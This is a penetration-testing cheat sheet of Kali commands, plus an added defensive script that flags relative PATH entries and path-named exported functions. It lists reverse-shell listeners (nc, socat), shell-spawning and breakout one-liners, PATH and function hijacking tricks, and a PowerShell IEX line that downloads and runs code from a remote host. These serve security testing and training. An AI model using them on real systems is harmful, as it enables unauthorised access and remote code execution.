Tips & Tricks


Web Tools

http://rumkin.com/tools/cipher/
https://wappalyzer.com/
https://retdec.com/decompilation/
https://www.ssllabs.com/ssltest/analyze.html
https://searchdns.netcraft.com/
https://hashkiller.co.uk/ntlm-decrypter.aspx
https://www.onlinedisassembler.com/odaweb/
https://hashes.org/public.php
http://www.csgnetwork.com/hexaddsubcalc.html
https://gchq.github.io/CyberChef/
https://www.cleancss.com/html-beautify/
http://jsnice.org/
http://jsbeautifier.org/

Browser Extensions

Firefox
FoxyProxy
HackBar
TamperData

Networking

# Set IP
Kali> ifconfig eth0 xxx.xxx.xxx.xxx/24

# Calculate subnet
Kali> ipcalc xxx.xxx.xxx.xxx/24

# Bring devices up/down
Kali> ifconfig eth0 up
Kali> ifconfig eth0 down

# Get IP from DHCP
Kali> dhclient

# Log traffic for ICMP packets
Kali> tcpdump -i tun0 icmp

# Test from remote box
Kali> ping $ATTACKER -c 3

Listen for Shell

TCP
Kali> nc -vlnp 54321
UDP
Kali> socat file:`tty`,echo=0,raw udp-listen:54321

Start a simple HTTP server

Kali> python -m SimpleHTTPServer 80
Kali> python3 -m http.server
Kali> ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
Kali> php -S 0.0.0.0:80

Workspace

# A temporary file system that clears on reboot
Kali> cd /dev/shm

Bash Foo

Simple for loop
Kali> for i in `seq 10 20`;do this;done
Remove last byte from a file
Kali> truncate -s -1 filename
Hijack full path to a binary for current pts
Kali> function /usr/bin/foo () { /usr/bin/echo "It works"; }
Kali> export -f /usr/bin/foo
Use Env to force scripts to run a different command
Kali> ln -s /usr/bin/nano cat
Kali> export PATH=.:$PATH
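
Added example (not part of the original cheat sheet): a check for the two overrides above on a box you are defending or cleaning up. The helper names `audit_path` and `slash_functions` are hypothetical, and the function check assumes the `BASH_FUNC_<name>%%=` environment encoding that current upstream bash uses for exported functions.

```shell
#!/bin/sh
# Added example: defensive checks for the two overrides above.
# audit_path and slash_functions are hypothetical helper names.

# audit_path PATHSTRING
# Prints one finding per PATH entry that resolves relative to the current
# directory ('.', any non-absolute entry, or an empty entry).
# Returns 1 if anything was flagged, 0 otherwise.
audit_path() {
    findings=0
    rest="$1:"            # trailing ':' so the last entry is also visited
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        case "$entry" in
            "") echo "empty entry (treated as current directory)"; findings=1 ;;
            /*) ;;        # absolute entry: not flagged by this check
            *)  echo "relative entry: $entry"; findings=1 ;;
        esac
    done
    return "$findings"
}

# slash_functions
# Reads `env` output on stdin and prints the names of exported bash functions
# whose name contains '/', i.e. functions that shadow a full-path invocation.
# Assumes the BASH_FUNC_<name>%%= encoding (see lead-in).
slash_functions() {
    sed -n 's|^BASH_FUNC_\(.*/.*\)%%=.*|\1|p'
}

# Check the current session.
audit_path "$PATH" || true
env | slash_functions
```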

SSH

Generate key
Kali> ssh-keygen -t rsa
SSH with Key
Kali> ssh -i key_file user@host

Port Knocking

Kali> for x in port1 port2 port3;do nmap -Pn --host-timeout 201 --max-retries 0 -p $x $TARGET;done
Kali> nc -z $TARGET port1 port2 port3;

Breakout Shell

Kali> awk 'BEGIN {system("/bin/bash")}'
Kali> python -c 'import pty; pty.spawn("/bin/bash")'
Kali> echo os.system('/bin/bash');
Kali> /bin/sh -i

Upgrade Shell

Netcat
# Background current shell: CTRL + Z
Kali> stty raw -echo
Kali> fg
Powershell
C:\> powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.1/file.txt')"

# Links
https://github.com/trustedsec/unicorn
Resources
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

Stego

Kali> exiftool filename.png
Kali> steghide extract -sf filename.png